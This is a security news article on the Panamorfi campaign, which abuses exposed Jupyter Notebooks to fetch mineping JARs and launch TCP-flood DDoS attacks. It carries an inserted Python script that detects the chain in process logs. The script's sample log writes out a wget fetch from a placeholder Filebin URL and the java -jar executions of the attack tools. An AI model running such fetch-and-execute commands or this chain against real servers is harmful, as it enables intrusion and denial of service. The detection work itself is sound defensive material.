Cybersecurity researchers have revealed details of a new distributed denial-of-service (DDoS) attack campaign targeting misconfigured Jupyter Notebooks.
The campaign, named Panamorfi by cloud security firm Aqua, uses a Java-based tool called mineping to launch a TCP flood DDoS attack. Mineping is typically a DDoS package designed for Minecraft game servers.
The attack chain involves exploiting internet-exposed Jupyter Notebook instances to execute wget commands that fetch a ZIP archive from a file-sharing site called Filebin.
The ZIP file contains two Java archive (JAR) files, conn.jar and mineping.jar. The conn.jar file is used to establish connections to a Discord channel and trigger the execution of the mineping.jar package.
“This attack aims to consume the resources of the target server by sending a large number of TCP connection requests,” explained Aqua researcher Assaf Morag. “The results are written to the Discord channel.”
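The chain described above (a wget fetch from Filebin, then execution of conn.jar and mineping.jar) can be hunted for in process-creation telemetry. The following is an added example, not code from Aqua's report. The log format, the `jupyter|ipykernel` parent pattern and the `filebin.example` placeholder URL are assumptions made for illustration.

```python
import re
import shlex
from urllib.parse import urlparse
# Constructed process-creation records (not from the report): time host pid ppid cmdline
SAMPLE = """\
10:00:01 nb-01 100 1 /usr/bin/python3 -m jupyter notebook --ip=0.0.0.0
10:00:02 nb-01 140 100 /usr/bin/python3 -m ipykernel_launcher -f kernel.json
10:05:10 nb-01 201 140 wget https://filebin.example/PLACEHOLDER/archive.zip
10:05:30 nb-01 203 140 java -jar conn.jar
10:05:31 nb-01 204 203 java -jar mineping.jar
10:07:00 build-02 300 1 java -jar app.jar
"""
JARS = {"conn.jar", "mineping.jar"}         # archive names given in the article
JUPYTER = re.compile(r"jupyter|ipykernel")  # assumption: how the notebook appears in cmdlines

def classify(argv):
    """Return the stage of the described chain that a command line matches, or None."""
    prog = argv[0].rsplit("/", 1)[-1]
    if prog == "wget":
        hosts = [urlparse(a).hostname or "" for a in argv[1:] if "://" in a]
        if any("filebin" in h.split(".") for h in hosts):
            return "download"
    if prog == "java" and "-jar" in argv[:-1]:
        if argv[argv.index("-jar") + 1].rsplit("/", 1)[-1] in JARS:
            return "jar-exec"

def under_jupyter(host, ppid, procs):
    """Walk the parent chain; True if any ancestor is a Jupyter process."""
    seen = set()
    while (host, ppid) in procs and ppid not in seen:
        seen.add(ppid)
        ppid, cmd = procs[(host, ppid)]
        if JUPYTER.search(cmd):
            return True
    return False

def detect(log):
    """Map host -> [(stage, pid)] for matching commands spawned beneath Jupyter."""
    procs, hits = {}, {}
    for line in log.splitlines():
        _ts, host, pid, ppid, cmd = line.split(" ", 4)
        procs[(host, pid)] = (ppid, cmd)
        stage = classify(shlex.split(cmd))
        if stage and under_jupyter(host, ppid, procs):
            hits.setdefault(host, []).append((stage, pid))
    return hits

def full_chain(hits):  # hosts where both the download and the JAR execution were seen
    return sorted(h for h, ev in hits.items() if {"download", "jar-exec"} <= {s for s, _ in ev})
```

Requiring Jupyter ancestry keeps unrelated Java jobs out of the results; `full_chain(detect(SAMPLE))` reports only the notebook host.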
The attack campaign has been linked to a threat actor known as yawixooo, who has a GitHub account with a public repository containing a Minecraft server properties file.
This is not the first time internet-accessible Jupyter Notebooks have been targeted by adversaries. In October 2023, a Tunisian threat actor named Qubitstrike was observed breaching Jupyter Notebooks to illicitly mine cryptocurrency and infiltrate cloud environments.